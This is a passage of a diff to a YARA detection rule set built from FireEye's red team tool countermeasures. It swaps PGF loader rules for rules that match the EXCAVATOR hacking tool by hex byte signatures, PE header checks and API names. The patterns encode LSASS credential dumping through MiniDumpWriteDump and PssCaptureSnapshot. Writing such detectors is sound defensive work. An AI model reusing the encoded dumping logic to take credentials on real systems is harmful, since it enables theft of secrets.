1B F7 DE C6 1A F6 86 AE 1B F7 85 AE 1A F7 BF AE 1B F7 84 C3 12 F6 81 AE 1B F7 84 C3 E4 F7 84 AE 1B F7 84 C3 19 F6 84 AE 1B F7 } - $rich3 = { D6 60 82 B8 92 01 EC EB 92 01 EC EB 92 01 EC EB 9B 79 7F EB 94 01 EC EB 1A 66 ED EA 90 01 EC EB 1A 66 E9 EA 98 01 EC EB 1A 66 E8 EA 9A 01 EC EB 1A 66 EF EA 90 01 EC EB C9 69 ED EA 91 01 EC EB 92 01 ED EB AF 01 EC EB 93 6C E5 EA 96 01 EC EB 93 6C 13 EB 93 01 EC EB 93 6C EE EA 93 01 EC EB } - $rich4 = { 41 36 64 33 05 57 0A 60 05 57 0A 60 05 57 0A 60 73 CA 71 60 01 57 0A 60 0C 2F 9F 60 04 57 0A 60 0C 2F 89 60 3D 57 0A 60 0C 2F 8E 60 0A 57 0A 60 05 57 0B 60 4A 57 0A 60 0C 2F 99 60 06 57 0A 60 73 CA 67 60 04 57 0A 60 0C 2F 98 60 04 57 0A 60 0C 2F 80 60 04 57 0A 60 22 91 74 60 04 57 0A 60 0C 2F 9B 60 04 57 0A 60 } + $bytes1 = { 4C 89 74 24 20 55 48 8D AC 24 60 FF FF FF 48 81 EC A0 01 00 00 48 8B 05 4C 4A 01 00 48 33 C4 48 89 85 90 00 00 00 BA 50 00 00 00 C7 05 CB 65 01 00 43 00 3A 00 66 89 15 EC 65 01 00 4C 8D 44 24 68 48 8D 15 D8 68 01 00 C7 05 B2 65 01 00 5C 00 57 00 33 C9 C7 05 AA 65 01 00 69 00 6E 00 C7 05 A4 65 01 00 64 00 6F 00 C7 05 9E 65 01 00 77 00 73 00 C7 05 98 65 01 00 5C 00 4D 00 C7 05 92 65 01 00 45 00 4D 00 C7 05 8C 65 01 00 4F 00 52 00 C7 05 86 65 01 00 59 00 2E 00 C7 05 80 65 01 00 44 00 4D 00 C7 05 72 68 01 00 53 00 65 00 C7 05 6C 68 01 00 44 00 65 00 C7 05 66 68 01 00 42 00 75 00 C7 05 60 68 01 00 47 00 50 00 C7 05 5A 68 01 00 72 00 69 00 C7 05 54 68 01 00 56 00 69 00 C7 05 4E 68 01 00 4C 00 45 00 C7 05 48 68 01 00 67 00 65 00 C7 05 12 67 01 00 6C 73 61 73 C7 05 0C 67 01 00 73 2E 65 78 C6 05 09 67 01 00 65 FF 15 63 B9 00 00 45 33 F6 85 C0 74 66 48 8B 44 24 68 48 89 44 24 74 C7 44 24 70 01 00 00 00 C7 44 24 7C 02 00 00 00 FF 15 A4 B9 00 00 48 8B C8 4C 8D 44 24 48 41 8D 56 20 FF 15 1A B9 00 00 85 C0 74 30 48 8B 4C 24 48 4C 8D 44 24 70 4C 89 74 24 28 45 33 C9 33 D2 4C 89 74 24 20 FF 15 EF B8 00 00 FF 15 11 B9 00 00 48 8B 4C 24 48 FF 15 16 B9 00 00 48 89 9C 24 B0 01 00 00 48 8D 0D BF 2E 01 00 48 89 B4 24 B8 01 00 00 4C 89 74 24 40 FF 15 1C B9 00 00 48 85 C0 0F 84 B0 00 00 00 48 8D 15 AC 2E 01 00 48 8B C8 FF 15 1B B9 00 00 48 8B D8 48 85 C0 0F 84 94 00 00 00 33 D2 48 8D 4D 80 41 B8 04 01 00 00 E8 06 15 00 00 48 8B 4C 24 40 48 8D 44 24 40 45 33 C9 48 89 44 24 20 45 33 C0 BA 00 00 00 02 FF D3 85 C0 75 63 66 0F 1F 44 00 00 48 8B 4C 24 40 4C 8D 45 80 41 B9 04 01 00 00 33 D2 FF 15 89 B8 00 00 48 8D 15 F2 65 01 00 48 8D 4D 80 E8 49 0F 00 00 48 85 C0 75 38 33 D2 48 8D 4D 80 41 B8 04 01 00 00 E8 A3 14 00 00 48 8B 4C 24 40 48 8D 44 24 40 45 33 C9 48 89 44 24 20 45 33 C0 BA 00 00 00 02 FF D3 85 C0 74 A3 33 C0 E9 F5 00 00 00 48 8B 5C 24 40 48 8B CB FF 15 5E B8 00 00 8B F0 48 85 DB 74 E4 85 C0 74 E0 4C 8D 4C 24 50 48 89 BC 24 C0 01 00 00 BA FD 03 00 AC 41 B8 1F 00 10 00 48 8B CB FF 15 12 B8 00 00 85 C0 0F 85 A0 00 00 00 48 8D 05 43 FD FF FF 4C 89 74 24 30 C7 44 24 28 80 00 00 00 48 8D 0D 3F 63 01 00 45 33 C9 48 89 44 24 58 45 33 C0 C7 44 24 20 01 00 00 00 BA 00 00 00 10 4C 89 74 24 60 FF 15 E4 B7 00 00 48 8B F8 48 83 F8 FF 74 59 48 8B 4C 24 50 48 8D 44 24 58 48 89 44 24 30 41 B9 02 00 00 00 4C 89 74 24 28 4C 8B C7 8B D6 4C 89 74 24 20 FF 15 B1 B9 00 00 48 8B CB FF 15 78 B7 00 00 48 8B CF FF 15 6F B7 00 00 FF 15 B1 B7 00 00 48 8B 54 24 50 48 8B C8 FF 15 53 B7 00 00 33 C9 FF 15 63 B7 00 00 CC 48 8B CB FF 15 49 B7 00 00 48 8B BC 24 C0 01 00 00 33 C0 48 8B B4 24 B8 01 00 00 48 8B 9C 24 B0 01 00 00 48 8B 8D 90 00 00 00 48 33 CC E8 28 00 00 00 4C 8B B4 24 C8 01 00 00 48 81 C4 A0 01 00 00 5D C3 } + $bytes2 = { 4C 89 74 24 20 55 48 8D AC 24 60 FF FF FF 48 81 EC A? ?1 ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 33 C4 48 89 85 9? ?? ?? ?0 BA ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? 66 89 ?? ?? ?? ?? ?? 4C 8D 44 24 68 48 ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? 33 C9 C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C6 ?? ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 45 33 F6 85 C0 74 ?? 48 8B 44 24 68 48 89 44 24 74 C7 44 24 7? ?1 ?? ?? ?? C7 44 24 7C 02 ?? ?? ?? FF ?? ?? ?? ?? ?? 48 8B C8 4C 8D 44 24 48 41 8D 56 20 FF ?? ?? ?? ?? ?? 85 C0 74 ?? 48 8B 4C 24 48 4C 8D 44 24 70 4C 89 74 24 28 45 33 C9 33 D2 4C 89 74 24 20 FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 48 8B 4C 24 48 FF ?? ?? ?? ?? ?? 48 89 9C 24 B? ?1 ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 89 B4 24 B8 01 ?? ?? 4C 89 74 24 40 FF ?? ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 8B C8 FF ?? ?? ?? ?? ?? 48 8B D8 48 85 C0 0F 84 ?? ?? ?? ?? 33 D2 48 8D 4D 80 41 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 4C 24 40 48 8D 44 24 40 45 33 C9 48 89 44 24 20 45 33 C0 BA ?? ?? ?? ?? FF D3 85 C0 75 ?? 66 0F 1F 44 ?? ?? 48 8B 4C 24 40 4C 8D 45 80 41 ?? ?? ?? ?? ?? 33 D2 FF ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 8D 4D 80 E8 ?? ?? ?? ?? 48 85 C0 75 ?? 33 D2 48 8D 4D 80 41 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 4C 24 40 48 8D 44 24 40 45 33 C9 48 89 44 24 20 45 33 C0 BA ?? ?? ?? ?? FF D3 85 C0 74 ?? 33 C0 E9 ?? ?? ?? ?? 48 8B 5C 24 40 48 8B CB FF ?? ?? ?? ?? ?? 8B F0 48 85 DB 74 ?? 85 C0 74 ?? 4C 8D 4C 24 50 48 89 BC 24 C? ?1 ?? ?? BA ?? ?? ?? ?? 41 ?? ?? ?? ?? ?? 48 8B CB FF ?? ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 4C 89 74 24 30 C7 ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 45 33 C9 48 89 44 24 58 45 33 C0 C7 44 24 2? ?1 ?? ?? ?? BA ?? ?? ?? ?? 4C 89 74 24 60 FF ?? ?? ?? ?? ?? 48 8B F8 48 83 F8 FF 74 ?? 48 8B 4C 24 50 48 8D 44 24 58 48 89 44 24 30 41 B9 02 ?? ?? ?? 4C 89 74 24 28 4C 8B C7 8B D6 4C 89 74 24 20 FF ?? ?? ?? ?? ?? 48 8B CB FF ?? ?? ?? ?? ?? 48 8B CF FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 48 8B 54 24 50 48 8B C8 FF ?? ?? ?? ?? ?? 33 C9 FF ?? ?? ?? ?? ?? 48 8B CB FF ?? ?? ?? ?? ?? 48 8B BC 24 C? ?1 ?? ?? 33 C0 48 8B B4 24 B8 01 ?? ?? 48 8B 9C 24 B? ?1 ?? ?? 48 8B 8D 9? ?? ?? ?0 48 33 CC E8 ?? ?? ?? ?? 4C 8B B4 24 C8 01 ?? ?? 48 81 C4 A? ?1 ?? ?? 5D C3 } + $bytes3 = { 4C 89 74 24 20 55 48 8D AC 24 60 FF FF FF 48 81 EC A? ?1 ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 33 C4 48 89 85 9? ?? ?? ?0 BA ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? 66 89 ?? ?? ?? ?? ?? 4C 8D 44 24 68 48 ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? 33 C9 C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C6 ?? ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 45 33 F6 85 C0 74 ?? 48 8B 44 24 68 48 89 44 24 74 C7 44 24 7? ?1 ?? ?? ?? C7 44 24 7C 02 ?? ?? ?? FF ?? ?? ?? ?? ?? 48 8B C8 4C 8D 44 24 48 41 8D 56 20 FF ?? ?? ?? ?? ?? 85 C0 74 ?? 48 8B 4C 24 48 4C 8D 44 24 70 4C 89 74 24 28 45 33 C9 33 D2 4C 89 74 24 20 FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 48 8B 4C 24 48 FF ?? ?? ?? ?? ?? 48 89 9C 24 B? ?1 ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 89 B4 24 B8 01 ?? ?? 4C 89 74 24 40 FF ?? ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 8B C8 FF ?? ?? ?? ?? ?? 48 8B D8 48 85 C0 0F 84 ?? ?? ?? ?? 33 D2 48 8D 4D 80 41 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 4C 24 40 48 8D 44 24 40 45 33 C9 48 89 44 24 20 45 33 C0 BA ?? ?? ?? ?? FF D3 85 C0 75 ?? 66 0F 1F 44 ?? ?? 48 8B 4C 24 40 4C 8D 45 80 41 ?? ?? ?? ?? ?? 33 D2 FF ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 8D 4D 80 E8 ?? ?? ?? ?? 48 85 C0 75 ?? 33 D2 48 8D 4D 80 41 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 4C 24 40 48 8D 44 24 40 45 33 C9 48 89 44 24 20 45 33 C0 BA ?? ?? ?? ?? FF D3 85 C0 74 ?? 33 C0 E9 ?? ?? ?? ?? 48 8B 5C 24 40 48 8B CB FF ?? ?? ?? ?? ?? 8B F0 48 85 DB 74 ?? 85 C0 74 ?? 4C 8D 4C 24 50 48 89 BC 24 C? ?1 ?? ?? BA ?? ?? ?? ?? 41 ?? ?? ?? ?? ?? 48 8B CB FF ?? ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 4C 89 74 24 30 C7 ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 45 33 C9 48 89 44 24 58 45 33 C0 C7 44 24 2? ?1 ?? ?? ?? BA ?? ?? ?? ?? 4C 89 74 24 60 FF ?? ?? ?? ?? ?? 48 8B F8 48 83 F8 FF 74 ?? 48 8B 4C 24 50 48 8D 44 24 58 48 89 44 24 30 41 B9 02 ?? ?? ?? 4C 89 74 24 28 4C 8B C7 8B D6 4C 89 74 24 20 FF ?? ?? ?? ?? ?? 48 8B CB FF ?? ?? ?? ?? ?? 48 8B CF FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 48 8B 54 24 50 48 8B C8 FF ?? ?? ?? ?? ?? 33 C9 FF ?? ?? ?? ?? ?? 48 8B CB FF ?? ?? ?? ?? ?? 48 8B BC 24 C? ?1 ?? ?? 33 C0 48 8B B4 24 B8 01 ?? ?? 48 8B 9C 24 B? ?1 ?? ?? 48 8B 8D 9? ?? ?? ?0 48 33 CC E8 ?? ?? ?? ?? 4C 8B B4 24 C8 01 ?? ?? 48 81 C4 A? ?1 ?? ?? 5D C3 } + $bytes4 = { 4C 89 74 24 ?? 55 48 8D AC 24 ?? ?? ?? ?? 48 81 EC A0 01 00 00 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 85 ?? ?? ?? ?? BA 50 00 00 00 C7 05 ?? ?? ?? ?? 43 00 3A 00 66 89 15 ?? ?? 01 00 4C 8D 44 24 ?? 48 8D 15 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? 5C 00 57 00 33 C9 C7 05 ?? ?? ?? ?? 69 00 6E 00 C7 05 ?? ?? ?? ?? 64 00 6F 00 C7 05 ?? ?? ?? ?? 77 00 73 00 C7 05 ?? ?? ?? ?? 5C 00 4D 00 C7 05 ?? ?? ?? ?? 45 00 4D 00 C7 05 ?? ?? ?? ?? 4F 00 52 00 C7 05 ?? ?? ?? ?? 59 00 2E 00 C7 05 ?? ?? ?? ?? 44 00 4D 00 C7 05 ?? ?? ?? ?? 53 00 65 00 C7 05 ?? ?? ?? ?? 44 00 65 00 C7 05 ?? ?? ?? ?? 42 00 75 00 C7 05 ?? ?? ?? ?? 47 00 50 00 C7 05 ?? ?? ?? ?? 72 00 69 00 C7 05 ?? ?? ?? ?? 56 00 69 00 C7 05 ?? ?? ?? ?? 4C 00 45 00 C7 05 ?? ?? ?? ?? 67 00 65 00 C7 05 ?? ?? ?? ?? 6C 73 61 73 C7 05 ?? ?? ?? ?? 73 2E 65 78 C6 05 ?? ?? ?? ?? 65 FF 15 ?? ?? ?? ?? 45 33 F6 85 C0 74 ?? 48 8B 44 24 ?? 48 89 44 24 ?? C7 44 24 ?? 01 00 00 00 C7 44 24 ?? 02 00 00 00 FF 15 ?? ?? ?? ?? 48 8B C8 4C 8D 44 24 ?? 41 8D 56 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 48 8B 4C 24 ?? 4C 8D 44 24 ?? 4C 89 74 24 ?? 45 33 C9 33 D2 4C 89 74 24 ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 89 B4 24 ?? ?? ?? ?? 4C 89 74 24 ?? FF 15 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8B C8 FF 15 ?? ?? ?? ?? 48 8B D8 48 85 C0 0F 84 ?? ?? ?? ?? 33 D2 48 8D 4D ?? 41 B8 04 01 00 00 E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8D 44 24 ?? 45 33 C9 48 89 44 24 ?? 45 33 C0 BA 00 00 00 02 FF D3 85 C0 75 ?? 66 0F 1F 44 00 ?? 48 8B 4C 24 ?? 4C 8D 45 ?? 41 B9 04 01 00 00 33 D2 FF 15 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 48 85 C0 75 ?? 33 D2 48 8D 4D ?? 41 B8 04 01 00 00 E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8D 44 24 ?? 45 33 C9 48 89 44 24 ?? 45 33 C0 BA 00 00 00 02 FF D3 85 C0 74 ?? 33 C0 E9 ?? ?? ?? ?? 48 8B 5C 24 ?? 48 8B CB FF 15 ?? ?? ?? ?? 8B F0 48 85 DB 74 ?? 85 C0 74 ?? 4C 8D 4C 24 ?? 48 89 BC 24 ?? ?? ?? ?? BA FD 03 00 AC 41 B8 1F 00 10 00 48 8B CB FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ?? 4C 89 74 24 ?? C7 44 24 ?? 80 00 00 00 48 8D 0D ?? ?? ?? ?? 45 33 C9 48 89 44 24 ?? 45 33 C0 C7 44 24 ?? 01 00 00 00 BA 00 00 00 10 4C 89 74 24 ?? FF 15 ?? ?? ?? ?? 48 8B F8 48 83 F8 FF 74 ?? 48 8B 4C 24 ?? 48 8D 44 24 ?? 48 89 44 24 ?? 41 B9 02 00 00 00 4C 89 74 24 ?? 4C 8B C7 8B D6 4C 89 74 24 ?? FF 15 ?? ?? ?? ?? 48 8B CB FF 15 ?? ?? ?? ?? 48 8B CF FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8B 54 24 ?? 48 8B C8 FF 15 ?? ?? ?? ?? 33 C9 FF 15 ?? ?? ?? ?? CC 48 8B CB FF 15 ?? ?? ?? ?? 48 8B BC 24 ?? ?? ?? ?? 33 C0 48 8B B4 24 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? 48 33 CC E8 ?? ?? ?? ?? 4C 8B B4 24 ?? ?? ?? ?? 48 81 C4 A0 01 00 00 5D C3 } condition: - ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and filesize <15MB and (($rich1 at 128) or ($rich2 at 128) or ($rich3 at 128) or ($rich4 at 128)) + uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550 and any of ($bytes*) } -rule FIREEYE_RT_APT_Loader_Win64_PGF_4 : FILE +rule FIREEYE_RT_APT_Hacktool_Win64_EXCAVATOR_1 : FILE { meta: description = "No description has been set in the source file - FireEye-RT" author = "FireEye" - id = "4c93ba76-d3a5-568d-88b8-79a6ebc2edbb" - date = "2020-11-26" - date = "2020-11-26" + id = "e593b589-747d-53c2-a39a-57485e4f7641" + date = "2020-11-30" + date = "2020-11-30" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PGF/production/yara/APT_Loader_Win64_PGF_4.yar#L4-L17" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/EXCAVATOR/production/yara/APT_HackTool_Win64_EXCAVATOR_1.yar#L4-L19" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "3bb34ebd93b8ab5799f4843e8cc829fa" - logic_hash = "fcc92674e58ec6418d7c709e3f3bc2e1ec859fe0cb444412964a978fb69f5234" + hash = "6a9a114928554c26675884eeb40cc01b" + logic_hash = "aa06628ddef0f95c4217b97a3476a0ee12e00d04c4827a512730598f3c80f1f6" score = 75 quality = 75 tags = "FILE" - rev = 1 + rev = 3 strings: - $sb1 = { 41 B9 04 00 00 00 41 B8 00 10 00 00 BA [4] B9 00 00 00 00 [0-32] FF [1-24] 7? [1-150] 8B 45 [0-32] 44 0F B? ?? 8B [2-16] B? CD CC CC CC [0-16] C1 ?? 04 [0-16] C1 ?? 02 [0-16] C1 ?? 02 [0-16] 48 8? 05 [4-32] 31 [1-4] 88 } - $sb2 = { C? 45 ?? 48 [0-32] B8 [0-64] FF [0-32] E0 [0-32] 41 B8 40 00 00 00 BA 0C 00 00 00 48 8B [2] 48 8B [2-32] FF [1-16] 48 89 10 8B 55 ?? 89 ?? 08 48 8B [2] 48 8D ?? 02 48 8B 45 18 48 89 02 } + $api1 = "PssCaptureSnapshot" fullword + $api2 = "MiniDumpWriteDump" fullword + $dump = { BA FD 03 00 AC [0-8] 41 B8 1F 00 10 00 48 8B ?? FF 15 [4] 85 C0 0F 85 [2] 00 00 [0-2] 48 8D 05 [5] 89 ?? 24 30 ( C7 44 24 28 80 00 00 00 48 8D 0D ?? ?? ?? ?? | 48 8D 0D ?? ?? ?? ?? C7 44 24 28 80 00 00 00 ) 45 33 C9 [0-5] 45 33 C0 C7 44 24 20 01 00 00 00 BA 00 00 00 10 [0-10] FF 15 [4] 48 8B ?? 48 83 F8 FF ( 74 | 0F 84 ) [1-4] 48 8B 4C 24 ?? 48 8D 44 24 ?? 48 89 44 24 30 ( 41 B9 02 00 00 00 | 44 8D 4D 02 ) ?? 89 ?? 24 28 4C 8B ?? 8B [2] 89 ?? 24 20 FF 15 [4] 48 8B ?? FF 15 [4] 48 8B ?? FF 15 [4] FF 15 [4] 48 8B 54 24 ?? 48 8B C8 FF 15 } + $lsass = { 6C 73 61 73 [6] 73 2E 65 78 [6] 65 } condition: - ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and ( uint16( uint32(0x3C)+0x18)==0x020B) and all of them + (( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and ( uint16( uint32(0x3C)+0x18)==0x020B)) and all of them } -rule FIREEYE_RT_APT_Loader_Win64_PGF_5 : FILE +rule FIREEYE_RT_Credtheft_Win_EXCAVATOR_1 : FILE { meta: - description = "PGF payload, generated rule based on symfunc/8167a6d94baca72bac554299d7c7f83c" + description = "This rule looks for the binary signature of the 'Inject' method found in the main Excavator PE." author = "FireEye" - id = "4fa4a1d6-cb63-582d-801c-b4c89c44d9ca" + id = "7cabc230-e55b-5096-996a-b6a8c9693bdc" date = "2020-12-09" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PGF/production/yara/APT_Loader_Win64_PGF_5.yar#L4-L18" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/EXCAVATOR/production/yara/CredTheft_Win_EXCAVATOR_1.yar#L4-L18" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "150224a0ccabce79f963795bf29ec75b" - logic_hash = "16495ad1e5ce4d4a79f4067f3d687911a1a0a3bfe4c6409ff9de4d111b1ddca6" + hash = "f7d9961463b5110a3d70ee2e97842ed3" + logic_hash = "bf4b776f34a1a9aa5438504f63a63ef452a747363de3b70cec52145d777055bd" score = 75 quality = 75 tags = "FILE" - rev = 3 + rev = 4 strings: - $cond1 = { 4C 89 44 24 18 89 54 24 10 48 89 4C 24 08 48 83 EC 38 48 8B 4C 24 40 FF 15 13 FA FF FF 8B 44 24 48 89 44 24 20 83 7C 24 20 01 74 02 EB 17 48 8B 44 24 40 48 89 05 66 23 00 00 48 8B 4C 24 40 FF 15 EB F9 FF FF B8 01 00 00 00 48 83 C4 38 C3 } - $cond2 = { 4C 89 44 24 18 89 54 24 10 48 89 4C 24 08 48 83 EC 38 48 8B 4C 24 40 FF 15 A3 FA FF FF 8B 44 24 48 89 44 24 20 83 7C 24 20 01 74 02 EB 17 48 8B 44 24 40 48 89 05 F6 20 00 00 48 8B 4C 24 40 FF 15 7B FA FF FF B8 01 00 00 00 48 83 C4 38 C3 } - $cond3 = { 4C 89 44 24 18 89 54 24 10 48 89 4C 24 08 48 83 EC 38 48 8B 4C 24 40 FF ?? ?? ?? ?? ?? 8B 44 24 48 89 44 24 20 83 7C 24 2? ?1 74 ?? EB ?? 48 8B 44 24 40 48 ?? ?? ?? ?? ?? ?? 48 8B 4C 24 40 FF ?? ?? ?? ?? ?? B8 01 ?? ?? ?? 48 83 C4 38 C3 } - $cond4 = { 4C 89 44 24 ?? 89 54 24 ?? 48 89 4C 24 ?? 48 83 EC 38 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 83 7C 24 ?? 01 74 ?? EB ?? 48 8B 44 24 ?? 48 89 05 ?? ?? ?? ?? 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? B8 01 00 00 00 48 83 C4 38 C3 } + $bytes1 = { 48 89 74 24 10 48 89 7C 24 18 4C 89 74 24 20 55 48 8D 6C 24 E0 48 81 EC 20 01 00 00 48 8B 05 75 BF 01 00 48 33 C4 48 89 45 10 0F 57 C0 45 33 F6 8B F1 4C 89 74 24 60 48 8D 0D 12 A1 01 00 4C 89 74 24 68 0F 11 45 A0 41 8B FE 4C 89 74 24 70 0F 11 45 B0 0F 11 45 C0 0F 11 45 D0 0F 11 45 E0 0F 11 45 F0 0F 11 45 00 FF 15 CB 1F 01 00 48 85 C0 75 1B FF 15 80 1F 01 00 8B D0 48 8D 0D DF A0 01 00 E8 1A FF FF FF 33 C0 E9 B4 02 00 00 48 8D 15 D4 A0 01 00 48 89 9C 24 30 01 00 00 48 8B C8 FF 15 4B 1F 01 00 48 8B D8 48 85 C0 75 19 FF 15 45 1F 01 00 8B D0 48 8D 0D A4 A0 01 00 E8 DF FE FF FF E9 71 02 00 00 48 8B 4C 24 60 48 8D 44 24 60 45 33 C9 48 89 44 24 20 45 33 C0 BA 00 00 00 02 FF D3 85 C0 75 45 66 66 0F 1F 84 00 00 00 00 00 48 8B 4C 24 60 FF 15 4D 1F 01 00 3B C6 74 22 48 8B 4C 24 60 48 8D 44 24 60 45 33 C9 48 89 44 24 20 45 33 C0 BA 00 00 00 02 FF D3 85 C0 74 D1 EB 0A 48 8B 44 24 60 48 89 44 24 70 66 0F 6F 15 6D A0 01 00 48 8D 05 A6 C8 01 00 B9 C8 05 00 00 90 F3 0F 6F 40 F0 48 8D 40 40 66 0F 6F CA 66 0F EF C8 F3 0F 7F 48 B0 66 0F 6F CA F3 0F 6F 40 C0 66 0F EF C8 F3 0F 7F 48 C0 66 0F 6F CA F3 0F 6F 40 D0 66 0F EF C8 F3 0F 7F 48 D0 F3 0F 6F 40 E0 66 0F EF C2 F3 0F 7F 40 E0 48 83 E9 01 75 B2 FF 15 CC 1E 01 00 4C 8D 44 24 78 BA 0A 00 00 00 48 8B C8 FF 15 01 1E 01 00 85 C0 0F 84 66 01 00 00 48 8B 4C 24 78 48 8D 45 80 41 B9 02 00 00 00 48 89 44 24 28 45 33 C0 C7 44 24 20 02 00 00 00 41 8D 51 09 FF 15 D8 1D 01 00 85 C0 0F 84 35 01 00 00 45 33 C0 4C 8D 4C 24 68 33 C9 41 8D 50 01 FF 15 5C 1E 01 00 FF 15 06 1E 01 00 4C 8B 44 24 68 33 D2 48 8B C8 FF 15 DE 1D 01 00 48 8B F8 48 85 C0 0F 84 FF 00 00 00 45 33 C0 4C 8D 4C 24 68 48 8B C8 41 8D 50 01 FF 15 25 1E 01 00 85 C0 0F 84 E2 00 00 00 4C 89 74 24 30 4C 8D 4C 24 70 4C 89 74 24 28 33 D2 41 B8 00 00 02 00 48 C7 44 24 20 08 00 00 00 48 8B CF FF 15 6C 1D 01 00 85 C0 0F 84 B1 00 00 00 48 8B 4D 80 48 8D 45 88 48 89 44 24 50 4C 8D 05 58 39 03 00 48 8D 45 A0 48 